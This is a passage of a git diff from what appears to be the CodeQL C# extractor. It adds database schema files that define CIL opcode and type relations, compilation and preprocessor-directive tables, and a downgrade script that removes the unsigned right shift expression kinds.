@cil_conv_u8 +| 111 = @cil_callvirt +| 112 = @cil_cpobj +| 113 = @cil_ldobj +| 114 = @cil_ldstr +| 115 = @cil_newobj +| 116 = @cil_castclass +| 117 = @cil_isinst +| 118 = @cil_conv_r_un +| 121 = @cil_unbox +| 122 = @cil_throw +| 123 = @cil_ldfld +| 124 = @cil_ldflda +| 125 = @cil_stfld +| 126 = @cil_ldsfld +| 127 = @cil_ldsflda +| 128 = @cil_stsfld +| 129 = @cil_stobj +| 130 = @cil_conv_ovf_i1_un +| 131 = @cil_conv_ovf_i2_un +| 132 = @cil_conv_ovf_i4_un +| 133 = @cil_conv_ovf_i8_un +| 134 = @cil_conv_ovf_u1_un +| 135 = @cil_conv_ovf_u2_un +| 136 = @cil_conv_ovf_u4_un +| 137 = @cil_conv_ovf_u8_un +| 138 = @cil_conv_ovf_i_un +| 139 = @cil_conv_ovf_u_un +| 140 = @cil_box +| 141 = @cil_newarr +| 142 = @cil_ldlen +| 143 = @cil_ldelema +| 144 = @cil_ldelem_i1 +| 145 = @cil_ldelem_u1 +| 146 = @cil_ldelem_i2 +| 147 = @cil_ldelem_u2 +| 148 = @cil_ldelem_i4 +| 149 = @cil_ldelem_u4 +| 150 = @cil_ldelem_i8 +| 151 = @cil_ldelem_i +| 152 = @cil_ldelem_r4 +| 153 = @cil_ldelem_r8 +| 154 = @cil_ldelem_ref +| 155 = @cil_stelem_i +| 156 = @cil_stelem_i1 +| 157 = @cil_stelem_i2 +| 158 = @cil_stelem_i4 +| 159 = @cil_stelem_i8 +| 160 = @cil_stelem_r4 +| 161 = @cil_stelem_r8 +| 162 = @cil_stelem_ref +| 163 = @cil_ldelem +| 164 = @cil_stelem +| 165 = @cil_unbox_any +| 179 = @cil_conv_ovf_i1 +| 180 = @cil_conv_ovf_u1 +| 181 = @cil_conv_ovf_i2 +| 182 = @cil_conv_ovf_u2 +| 183 = @cil_conv_ovf_i4 +| 184 = @cil_conv_ovf_u4 +| 185 = @cil_conv_ovf_i8 +| 186 = @cil_conv_ovf_u8 +| 194 = @cil_refanyval +| 195 = @cil_ckinfinite +| 198 = @cil_mkrefany +| 208 = @cil_ldtoken +| 209 = @cil_conv_u2 +| 210 = @cil_conv_u1 +| 211 = @cil_conv_i +| 212 = @cil_conv_ovf_i +| 213 = @cil_conv_ovf_u +| 214 = @cil_add_ovf +| 215 = @cil_add_ovf_un +| 216 = @cil_mul_ovf +| 217 = @cil_mul_ovf_un +| 218 = @cil_sub_ovf +| 219 = @cil_sub_ovf_un +| 220 = @cil_endfinally +| 221 = @cil_leave +| 222 = @cil_leave_s +| 223 = @cil_stind_i +| 224 = @cil_conv_u +| 65024 = @cil_arglist +| 65025 = @cil_ceq +| 65026 = @cil_cgt +| 65027 = @cil_cgt_un +| 65028 = @cil_clt +| 65029 = @cil_clt_un +| 65030 = @cil_ldftn +| 65031 = @cil_ldvirtftn +| 65033 = @cil_ldarg +| 65034 = @cil_ldarga +| 65035 = @cil_starg +| 65036 = @cil_ldloc +| 65037 = @cil_ldloca +| 65038 = @cil_stloc +| 65039 = @cil_localloc +| 65041 = @cil_endfilter +| 65042 = @cil_unaligned +| 65043 = @cil_volatile +| 65044 = @cil_tail +| 65045 = @cil_initobj +| 65046 = @cil_constrained +| 65047 = @cil_cpblk +| 65048 = @cil_initblk +| 65050 = @cil_rethrow +| 65052 = @cil_sizeof +| 65053 = @cil_refanytype +| 65054 = @cil_readonly +; + +// CIL ignored instructions + +@cil_ignore = @cil_nop | @cil_break | @cil_volatile | @cil_unaligned; + +// CIL local/parameter/field access + +@cil_ldarg_any = @cil_ldarg_0 | @cil_ldarg_1 | @cil_ldarg_2 | @cil_ldarg_3 | @cil_ldarg_s | @cil_ldarga_s | @cil_ldarg | @cil_ldarga; +@cil_starg_any = @cil_starg | @cil_starg_s; + +@cil_ldloc_any = @cil_ldloc_0 | @cil_ldloc_1 | @cil_ldloc_2 | @cil_ldloc_3 | @cil_ldloc_s | @cil_ldloca_s | @cil_ldloc | @cil_ldloca; +@cil_stloc_any = @cil_stloc_0 | @cil_stloc_1 | @cil_stloc_2 | @cil_stloc_3 | @cil_stloc_s | @cil_stloc; + +@cil_ldfld_any = @cil_ldfld | @cil_ldsfld | @cil_ldsflda | @cil_ldflda; +@cil_stfld_any = @cil_stfld | @cil_stsfld; + +@cil_local_access = @cil_stloc_any | @cil_ldloc_any; +@cil_arg_access = @cil_starg_any | @cil_ldarg_any; +@cil_read_access = @cil_ldloc_any | @cil_ldarg_any | @cil_ldfld_any; +@cil_write_access = @cil_stloc_any | @cil_starg_any | @cil_stfld_any; + +@cil_stack_access = @cil_local_access | @cil_arg_access; +@cil_field_access = @cil_ldfld_any | @cil_stfld_any; + +@cil_access = @cil_read_access | @cil_write_access; + +// CIL constant/literal instructions + +@cil_ldc_i = @cil_ldc_i4_any | @cil_ldc_i8; + +@cil_ldc_i4_any = @cil_ldc_i4_m1 | @cil_ldc_i4_0 | @cil_ldc_i4_1 | @cil_ldc_i4_2 | @cil_ldc_i4_3 | + @cil_ldc_i4_4 | @cil_ldc_i4_5 | @cil_ldc_i4_6 | @cil_ldc_i4_7 | @cil_ldc_i4_8 | @cil_ldc_i4_s | @cil_ldc_i4; + +@cil_ldc_r = @cil_ldc_r4 | @cil_ldc_r8; + +@cil_literal = @cil_ldnull | @cil_ldc_i | @cil_ldc_r | @cil_ldstr; + +// Control flow + +@cil_conditional_jump = @cil_binary_jump | @cil_unary_jump; +@cil_binary_jump = @cil_beq_s | @cil_bge_s | @cil_bgt_s | @cil_ble_s | @cil_blt_s | + @cil_bne_un_s | @cil_bge_un_s | @cil_bgt_un_s | @cil_ble_un_s | @cil_blt_un_s | + @cil_beq | @cil_bge | @cil_bgt | @cil_ble | @cil_blt | + @cil_bne_un | @cil_bge_un | @cil_bgt_un | @cil_ble_un | @cil_blt_un; +@cil_unary_jump = @cil_brfalse_s | @cil_brtrue_s | @cil_brfalse | @cil_brtrue | @cil_switch; +@cil_unconditional_jump = @cil_br | @cil_br_s | @cil_leave_any; +@cil_leave_any = @cil_leave | @cil_leave_s; +@cil_jump = @cil_unconditional_jump | @cil_conditional_jump; + +// CIL call instructions + +@cil_call_any = @cil_jmp | @cil_call | @cil_calli | @cil_tail | @cil_callvirt | @cil_newobj; + +// CIL expression instructions + +@cil_expr = @cil_literal | @cil_binary_expr | @cil_unary_expr | @cil_call_any | @cil_read_access | + @cil_newarr | @cil_ldtoken | @cil_sizeof | + @cil_ldftn | @cil_ldvirtftn | @cil_localloc | @cil_mkrefany | @cil_refanytype | @cil_arglist | @cil_dup; + +@cil_unary_expr = + @cil_conversion_operation | @cil_unary_arithmetic_operation | @cil_unary_bitwise_operation| + @cil_ldlen | @cil_isinst | @cil_box | @cil_ldobj | @cil_castclass | @cil_unbox_any | + @cil_ldind | @cil_unbox; + +@cil_conversion_operation = + @cil_conv_i1 | @cil_conv_i2 | @cil_conv_i4 | @cil_conv_i8 | + @cil_conv_u1 | @cil_conv_u2 | @cil_conv_u4 | @cil_conv_u8 | + @cil_conv_ovf_i | @cil_conv_ovf_i_un | @cil_conv_ovf_i1 | @cil_conv_ovf_i1_un | + @cil_conv_ovf_i2 | @cil_conv_ovf_i2_un | @cil_conv_ovf_i4 | @cil_conv_ovf_i4_un | + @cil_conv_ovf_i8 | @cil_conv_ovf_i8_un | @cil_conv_ovf_u | @cil_conv_ovf_u_un | + @cil_conv_ovf_u1 | @cil_conv_ovf_u1_un | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_ovf_u4 | @cil_conv_ovf_u4_un | @cil_conv_ovf_u8 | @cil_conv_ovf_u8_un | + @cil_conv_r4 | @cil_conv_r8 | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_i | @cil_conv_u | @cil_conv_r_un; + +@cil_ldind = @cil_ldind_i | @cil_ldind_i1 | @cil_ldind_i2 | @cil_ldind_i4 | @cil_ldind_i8 | + @cil_ldind_r4 | @cil_ldind_r8 | @cil_ldind_ref | @cil_ldind_u1 | @cil_ldind_u2 | @cil_ldind_u4; + +@cil_stind = @cil_stind_i | @cil_stind_i1 | @cil_stind_i2 | @cil_stind_i4 | @cil_stind_i8 | + @cil_stind_r4 | @cil_stind_r8 | @cil_stind_ref; + +@cil_bitwise_operation = @cil_binary_bitwise_operation | @cil_unary_bitwise_operation; + +@cil_binary_bitwise_operation = @cil_and | @cil_or | @cil_xor | @cil_shr | @cil_shr | @cil_shr_un | @cil_shl; + +@cil_binary_arithmetic_operation = @cil_add | @cil_sub | @cil_mul | @cil_div | @cil_div_un | + @cil_rem | @cil_rem_un | @cil_add_ovf | @cil_add_ovf_un | @cil_mul_ovf | @cil_mul_ovf_un | + @cil_sub_ovf | @cil_sub_ovf_un; + +@cil_unary_bitwise_operation = @cil_not; + +@cil_binary_expr = @cil_binary_arithmetic_operation | @cil_binary_bitwise_operation | @cil_read_array | @cil_comparison_operation; + +@cil_unary_arithmetic_operation = @cil_neg; + +@cil_comparison_operation = @cil_cgt_un | @cil_ceq | @cil_cgt | @cil_clt | @cil_clt_un; + +// Elements that retrieve an address of something +@cil_read_ref = @cil_ldloca_s | @cil_ldarga_s | @cil_ldflda | @cil_ldsflda | @cil_ldelema; + +// CIL array instructions + +@cil_read_array = + @cil_ldelem | @cil_ldelema | @cil_ldelem_i1 | @cil_ldelem_ref | @cil_ldelem_i | + @cil_ldelem_i1 | @cil_ldelem_i2 | @cil_ldelem_i4 | @cil_ldelem_i8 | @cil_ldelem_r4 | + @cil_ldelem_r8 | @cil_ldelem_u1 | @cil_ldelem_u2 | @cil_ldelem_u4; + +@cil_write_array = @cil_stelem | @cil_stelem_ref | + @cil_stelem_i | @cil_stelem_i1 | @cil_stelem_i2 | @cil_stelem_i4 | @cil_stelem_i8 | + @cil_stelem_r4 | @cil_stelem_r8; + +@cil_throw_any = @cil_throw | @cil_rethrow; + +#keyset[impl, index] +cil_instruction( + unique int id: @cil_instruction, + int opcode: int ref, + int index: int ref, + int impl: @cil_method_implementation ref); + +cil_jump( + unique int instruction: @cil_jump ref, + int target: @cil_instruction ref); + +cil_access( + unique int instruction: @cil_instruction ref, + int target: @cil_accessible ref); + +cil_value( + unique int instruction: @cil_literal ref, + string value: string ref); + +#keyset[instruction, index] +cil_switch( + int instruction: @cil_switch ref, + int index: int ref, + int target: @cil_instruction ref); + +cil_instruction_location( + unique int id: @cil_instruction ref, + int loc: @location ref); + +cil_type_location( + int id: @cil_type ref, + int loc: @location ref); + +cil_method_location( + int id: @cil_method ref, + int loc: @location ref); + +@cil_namespace = @namespace; + +@cil_type_container = @cil_type | @cil_namespace | @cil_method; + +case @cil_type.kind of + 0 = @cil_valueorreftype +| 1 = @cil_typeparameter +| 2 = @cil_array_type +| 3 = @cil_pointer_type +| 4 = @cil_function_pointer_type +; + +cil_type( + unique int id: @cil_type, + string name: string ref, + int kind: int ref, + int parent: @cil_type_container ref, + int sourceDecl: @cil_type ref); + +cil_pointer_type( + unique int id: @cil_pointer_type ref, + int pointee: @cil_type ref); + +cil_array_type( + unique int id: @cil_array_type ref, + int element_type: @cil_type ref, + int rank: int ref); + +cil_function_pointer_return_type( + unique int id: @cil_function_pointer_type ref, + int return_type: @cil_type ref); + +cil_method( + unique int id: @cil_method, + string name: string ref, + int parent: @cil_type ref, + int return_type: @cil_type ref); + +cil_method_source_declaration( + unique int method: @cil_method ref, + int source: @cil_method ref); + +cil_method_implementation( + unique int id: @cil_method_implementation, + int method: @cil_method ref, + int location: @assembly ref); + +cil_implements( + int id: @cil_method ref, + int decl: @cil_method ref); + +#keyset[parent, name] +cil_field( + unique int id: @cil_field, + int parent: @cil_type ref, + string name: string ref, + int field_type: @cil_type ref); + +@cil_element = @cil_instruction | @cil_declaration | @cil_handler | @cil_attribute | @cil_namespace; +@cil_named_element = @cil_declaration | @cil_namespace; +@cil_declaration = @cil_variable | @cil_method | @cil_type | @cil_member; +@cil_accessible = @cil_declaration; +@cil_variable = @cil_field | @cil_stack_variable; +@cil_stack_variable = @cil_local_variable | @cil_parameter; +@cil_member = @cil_method | @cil_type | @cil_field | @cil_property | @cil_event; +@cil_custom_modifier_receiver = @cil_method | @cil_property | @cil_parameter | @cil_field | @cil_function_pointer_type; +@cil_parameterizable = @cil_method | @cil_function_pointer_type; +@cil_has_type_annotation = @cil_stack_variable | @cil_property | @cil_method | @cil_function_pointer_type; + +#keyset[parameterizable, index] +cil_parameter( + unique int id: @cil_parameter, + int parameterizable: @cil_parameterizable ref, + int index: int ref, + int param_type: @cil_type ref); + +cil_parameter_in(unique int id: @cil_parameter ref); +cil_parameter_out(unique int id: @cil_parameter ref); + +cil_setter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +#keyset[id, modifier] +cil_custom_modifiers( + int id: @cil_custom_modifier_receiver ref, + int modifier: @cil_type ref, + int kind: int ref); // modreq: 1, modopt: 0 + +cil_type_annotation( + int id: @cil_has_type_annotation ref, + int annotation: int ref); + +cil_getter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +cil_adder(unique int event: @cil_event ref, + int method: @cil_method ref); + +cil_remover(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_raiser(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_property( + unique int id: @cil_property, + int parent: @cil_type ref, + string name: string ref, + int property_type: @cil_type ref); + +#keyset[parent, name] +cil_event(unique int id: @cil_event, + int parent: @cil_type ref, + string name: string ref, + int event_type: @cil_type ref); + +#keyset[impl, index] +cil_local_variable( + unique int id: @cil_local_variable, + int impl: @cil_method_implementation ref, + int index: int ref, + int var_type: @cil_type ref); + +cil_function_pointer_calling_conventions( + int id: @cil_function_pointer_type ref, + int kind: int ref); + +// CIL handlers (exception handlers etc). + +case @cil_handler.kind of + 0 = @cil_catch_handler +| 1 = @cil_filter_handler +| 2 = @cil_finally_handler +| 4 = @cil_fault_handler +; + +#keyset[impl, index] +cil_handler( + unique int id: @cil_handler, + int impl: @cil_method_implementation ref, + int index: int ref, + int kind: int ref, + int try_start: @cil_instruction ref, + int try_end: @cil_instruction ref, + int handler_start: @cil_instruction ref); + +cil_handler_filter( + unique int id: @cil_handler ref, + int filter_start: @cil_instruction ref); + +cil_handler_type( + unique int id: @cil_handler ref, + int catch_type: @cil_type ref); + +@cil_controlflow_node = @cil_entry_point | @cil_instruction; + +@cil_entry_point = @cil_method_implementation | @cil_handler; + +@cil_dataflow_node = @cil_instruction | @cil_variable | @cil_method; + +cil_method_stack_size( + unique int method: @cil_method_implementation ref, + int size: int ref); + +// CIL modifiers + +cil_public(int id: @cil_member ref); +cil_private(int id: @cil_member ref); +cil_protected(int id: @cil_member ref); +cil_internal(int id: @cil_member ref); +cil_static(int id: @cil_member ref); +cil_sealed(int id: @cil_member ref); +cil_virtual(int id: @cil_method ref); +cil_abstract(int id: @cil_member ref); +cil_class(int id: @cil_type ref); +cil_interface(int id: @cil_type ref); +cil_security(int id: @cil_member ref); +cil_requiresecobject(int id: @cil_method ref); +cil_specialname(int id: @cil_method ref); +cil_newslot(int id: @cil_method ref); + +cil_base_class(unique int id: @cil_type ref, int base: @cil_type ref); +cil_base_interface(int id: @cil_type ref, int base: @cil_type ref); +cil_enum_underlying_type(unique int id: @cil_type ref, int underlying: @cil_type ref); + +#keyset[unbound, index] +cil_type_parameter( + int unbound: @cil_member ref, + int index: int ref, + int param: @cil_typeparameter ref); + +#keyset[bound, index] +cil_type_argument( + int bound: @cil_member ref, + int index: int ref, + int t: @cil_type ref); + +// CIL type parameter constraints + +cil_typeparam_covariant(int tp: @cil_typeparameter ref); +cil_typeparam_contravariant(int tp: @cil_typeparameter ref); +cil_typeparam_class(int tp: @cil_typeparameter ref); +cil_typeparam_struct(int tp: @cil_typeparameter ref); +cil_typeparam_new(int tp: @cil_typeparameter ref); +cil_typeparam_constraint(int tp: @cil_typeparameter ref, int supertype: @cil_type ref); + +// CIL attributes + +cil_attribute( + unique int attributeid: @cil_attribute, + int element: @cil_declaration ref, + int constructor: @cil_method ref); + +#keyset[attribute_id, param] +cil_attribute_named_argument( + int attribute_id: @cil_attribute ref, + string param: string ref, + string value: string ref); + +#keyset[attribute_id, index] +cil_attribute_positional_argument( + int attribute_id: @cil_attribute ref, + int index: int ref, + string value: string ref); + + +// Common .Net data model covering both C# and CIL + +// Common elements +@dotnet_element = @element | @cil_element; +@dotnet_named_element = @named_element | @cil_named_element; +@dotnet_callable = @callable | @cil_method; +@dotnet_variable = @variable | @cil_variable; +@dotnet_field = @field | @cil_field; +@dotnet_parameter = @parameter | @cil_parameter; +@dotnet_declaration = @declaration | @cil_declaration; +@dotnet_member = @member | @cil_member; +@dotnet_event = @event | @cil_event; +@dotnet_property = @property | @cil_property | @indexer; +@dotnet_parameterizable = @parameterizable | @cil_parameterizable; + +// Common types +@dotnet_type = @type | @cil_type; +@dotnet_call = @call | @cil_call_any; +@dotnet_throw = @throw_element | @cil_throw_any; +@dotnet_valueorreftype = @cil_valueorreftype | @value_or_ref_type | @cil_array_type | @void_type; +@dotnet_typeparameter = @type_parameter | @cil_typeparameter; +@dotnet_array_type = @array_type | @cil_array_type; +@dotnet_pointer_type = @pointer_type | @cil_pointer_type; +@dotnet_type_parameter = @type_parameter | @cil_typeparameter; +@dotnet_generic = @dotnet_valueorreftype | @dotnet_callable; + +// Attributes +@dotnet_attribute = @attribute | @cil_attribute; + +// Expressions +@dotnet_expr = @expr | @cil_expr; + +// Literals +@dotnet_literal = @literal_expr | @cil_literal; +@dotnet_string_literal = @string_literal_expr | @cil_ldstr; +@dotnet_int_literal = @integer_literal_expr | @cil_ldc_i; +@dotnet_float_literal = @float_literal_expr | @cil_ldc_r; +@dotnet_null_literal = @null_literal_expr | @cil_ldnull; + +@metadata_entity = @cil_method | @cil_type | @cil_field | @cil_property | @field | @property | + @callable | @value_or_ref_type | @void_type; + +#keyset[entity, location] +metadata_handle(int entity : @metadata_entity ref, int location: @assembly ref, int handle: int ref) diff --git a/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/upgrade.properties b/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/upgrade.properties new file mode 100644 index 00000000000..d3e8b5e6318 --- /dev/null +++ b/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/upgrade.properties @@ -0,0 +1,3 @@ +description: Remove unsigned right shift and unsigned right shift assignment expression kinds. +compatibility: backwards +expressions.rel: run expressions.qlo \ No newline at end of file diff --git a/csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/old.dbscheme b/csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/old.dbscheme new file mode 100644 index 00000000000..83aca6b3e4f --- /dev/null +++ b/csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/old.dbscheme @@ -0,0 +1,2067 @@ +/* This is a dummy line to alter the dbscheme, so we can make a database upgrade + * without actually changing any of the dbscheme predicates. It contains a date + * to allow for such updates in the future as well. + * + * 2021-07-14 + * + * DO NOT remove this comment carelessly, since it can revert the dbscheme back to a + * previously seen state (matching a previously seen SHA), which would make the upgrade + * mechanism not work properly. + */ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * csc f1.cs f2.cs f3.cs + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | --compiler + * 1 | *path to compiler* + * 2 | f1.cs + * 3 | f2.cs + * 4 | f3.cs + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.cs + * 1 | f2.cs + * 2 | f3.cs + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The references used by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs /r:ref1.dll /r:ref2.dll /r:ref3.dll + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | ref1.dll + * 1 | ref2.dll + * 2 | ref3.dll + */ +#keyset[id, num] +compilation_referencing_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + unique int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +extractor_messages( + unique int id: @extractor_message, + int severity: int ref, + string origin : string ref, + string text : string ref, + string entity : string ref, + int location: @location_default ref, + string stack_trace : string ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +compilation_assembly( + unique int id : @compilation ref, + int assembly: @assembly ref +) + +// Populated by the CSV extractor +externalData( + int id: @externalDataElement, + string path: string ref, + int column: int ref, + string value: string ref); + +sourceLocationPrefix( + string prefix: string ref); + +/* + * C# dbscheme + */ + +/** ELEMENTS **/ + +@element = @declaration | @stmt | @expr | @modifier | @attribute | @namespace_declaration + | @using_directive | @type_parameter_constraints | @externalDataElement + | @xmllocatable | @asp_element | @namespace | @preprocessor_directive; + +@declaration = @callable | @generic | @assignable | @namespace; + +@named_element = @namespace | @declaration; + +@declaration_with_accessors = @property | @indexer | @event; + +@assignable = @variable | @assignable_with_accessors | @event; + +@assignable_with_accessors = @property | @indexer; + +@attributable = @assembly | @field | @parameter | @operator | @method | @constructor + | @destructor | @callable_accessor | @value_or_ref_type | @declaration_with_accessors + | @local_function | @lambda_expr; + +/** LOCATIONS, ASEMMBLIES, MODULES, FILES and FOLDERS **/ + +@location = @location_default | @assembly; + +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +locations_mapped( + unique int id: @location_default ref, + int mapped_to: @location_default ref); + +@sourceline = @file | @callable | @xmllocatable; + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref); + +assemblies( + unique int id: @assembly, + int file: @file ref, + string fullname: string ref, + string name: string ref, + string version: string ref); + +files( + unique int id: @file, + string name: string ref); + +folders( + unique int id: @folder, + string name: string ref); + +@container = @folder | @file ; + +containerparent( + int parent: @container ref, + unique int child: @container ref); + +file_extraction_mode( + unique int file: @file ref, + int mode: int ref + /* 0 = normal, 1 = standalone extractor */ + ); + +/** NAMESPACES **/ + +@type_container = @namespace | @type; + +namespaces( + unique int id: @namespace, + string name: string ref); + +namespace_declarations( + unique int id: @namespace_declaration, + int namespace_id: @namespace ref); + +namespace_declaration_location( + unique int id: @namespace_declaration ref, + int loc: @location ref); + +parent_namespace( + unique int child_id: @type_container ref, + int namespace_id: @namespace ref); + +@declaration_or_directive = @namespace_declaration | @type | @using_directive; + +parent_namespace_declaration( + int child_id: @declaration_or_directive ref, // cannot be unique because of partial classes + int namespace_id: @namespace_declaration ref); + +@using_directive = @using_namespace_directive | @using_static_directive; + +using_global( + unique int id: @using_directive ref +); + +using_namespace_directives( + unique int id: @using_namespace_directive, + int namespace_id: @namespace ref); + +using_static_directives( + unique int id: @using_static_directive, + int type_id: @type_or_ref ref); + +using_directive_location( + unique int id: @using_directive ref, + int loc: @location ref); + +@preprocessor_directive = @pragma_warning | @pragma_checksum | @directive_define | @directive_undefine | @directive_warning + | @directive_error | @directive_nullable | @directive_line | @directive_region | @directive_endregion | @directive_if + | @directive_elif | @directive_else | @directive_endif; + +@conditional_directive = @directive_if | @directive_elif; +@branch_directive = @directive_if | @directive_elif | @directive_else; + +directive_ifs( + unique int id: @directive_if, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref); /* 0: false, 1: true */ + +directive_elifs( + unique int id: @directive_elif, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +directive_elses( + unique int id: @directive_else, + int branchTaken: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +#keyset[id, start] +directive_endifs( + unique int id: @directive_endif, + unique int start: @directive_if ref); + +directive_define_symbols( + unique int id: @define_symbol_expr ref, + string name: string ref); + +directive_regions( + unique int id: @directive_region, + string name: string ref); + +#keyset[id, start] +directive_endregions( + unique int id: @directive_endregion, + unique int start: @directive_region ref); + +directive_lines( + unique int id: @directive_line, + int kind: int ref); /* 0: default, 1: hidden, 2: numeric, 3: span */ + +directive_line_value( + unique int id: @directive_line ref, + int line: int ref); + +directive_line_file( + unique int id: @directive_line ref, + int file: @file ref); + +directive_line_offset( + unique int id: @directive_line ref, + int offset: int ref); + +directive_line_span( + unique int id: @directive_line ref, + int startLine: int ref, + int startColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +directive_nullables( + unique int id: @directive_nullable, + int setting: int ref, /* 0: disable, 1: enable, 2: restore */ + int target: int ref); /* 0: none, 1: annotations, 2: warnings */ + +directive_warnings( + unique int id: @directive_warning, + string message: string ref); + +directive_errors( + unique int id: @directive_error, + string message: string ref); + +directive_undefines( + unique int id: @directive_undefine, + string name: string ref); + +directive_defines( + unique int id: @directive_define, + string name: string ref); + +pragma_checksums( + unique int id: @pragma_checksum, + int file: @file ref, + string guid: string ref, + string bytes: string ref); + +pragma_warnings( + unique int id: @pragma_warning, + int kind: int ref /* 0 = disable, 1 = restore */); + +#keyset[id, index] +pragma_warning_error_codes( + int id: @pragma_warning ref, + string errorCode: string ref, + int index: int ref); + +preprocessor_directive_location( + unique int id: @preprocessor_directive ref, + int loc: @location ref); + +preprocessor_directive_compilation( + unique int id: @preprocessor_directive ref, + int compilation: @compilation ref); + +preprocessor_directive_active( + unique int id: @preprocessor_directive ref, + int active: int ref); /* 0: false, 1: true */ + +/** TYPES **/ + +types( + unique int id: @type, + int kind: int ref, + string name: string ref); + +case @type.kind of + 1 = @bool_type +| 2 = @char_type +| 3 = @decimal_type +| 4 = @sbyte_type +| 5 = @short_type +| 6 = @int_type +| 7 = @long_type +| 8 = @byte_type +| 9 = @ushort_type +| 10 = @uint_type +| 11 = @ulong_type +| 12 = @float_type +| 13 = @double_type +| 14 = @enum_type +| 15 = @struct_type +| 17 = @class_type +| 19 = @interface_type +| 20 = @delegate_type +| 21 = @null_type +| 22 = @type_parameter +| 23 = @pointer_type +| 24 = @nullable_type +| 25 = @array_type +| 26 = @void_type +| 27 = @int_ptr_type +| 28 = @uint_ptr_type +| 29 = @dynamic_type +| 30 = @arglist_type +| 31 = @unknown_type +| 32 = @tuple_type +| 33 = @function_pointer_type + ; + +@simple_type = @bool_type | @char_type | @integral_type | @floating_point_type | @decimal_type; +@integral_type = @signed_integral_type | @unsigned_integral_type; +@signed_integral_type = @sbyte_type | @short_type | @int_type | @long_type; +@unsigned_integral_type = @byte_type | @ushort_type | @uint_type | @ulong_type; +@floating_point_type = @float_type | @double_type; +@value_type = @simple_type | @enum_type | @struct_type | @nullable_type | @int_ptr_type + | @uint_ptr_type | @tuple_type; +@ref_type = @class_type | @interface_type | @array_type | @delegate_type | @null_type + | @dynamic_type; +@value_or_ref_type = @value_type | @ref_type; + +typerefs( + unique int id: @typeref, + string name: string ref); + +typeref_type( + int id: @typeref ref, + unique int typeId: @type ref); + +@type_or_ref = @type | @typeref; + +array_element_type( + unique int array: @array_type ref, + int dimension: int ref, + int rank: int ref, + int element: @type_or_ref ref); + +nullable_underlying_type( + unique int nullable: @nullable_type ref, + int underlying: @type_or_ref ref); + +pointer_referent_type( + unique int pointer: @pointer_type ref, + int referent: @type_or_ref ref); + +enum_underlying_type( + unique int enum_id: @enum_type ref, + int underlying_type_id: @type_or_ref ref); + +delegate_return_type( + unique int delegate_id: @delegate_type ref, + int return_type_id: @type_or_ref ref); + +function_pointer_return_type( + unique int function_pointer_id: @function_pointer_type ref, + int return_type_id: @type_or_ref ref); + +extend( + int sub: @type ref, + int super: @type_or_ref ref); + +anonymous_types( + unique int id: @type ref); + +@interface_or_ref = @interface_type | @typeref; + +implement( + int sub: @type ref, + int super: @type_or_ref ref); + +type_location( + int id: @type ref, + int loc: @location ref); + +tuple_underlying_type( + unique int tuple: @tuple_type ref, + int struct: @type_or_ref ref); + +#keyset[tuple, index] +tuple_element( + int tuple: @tuple_type ref, + int index: int ref, + unique int field: 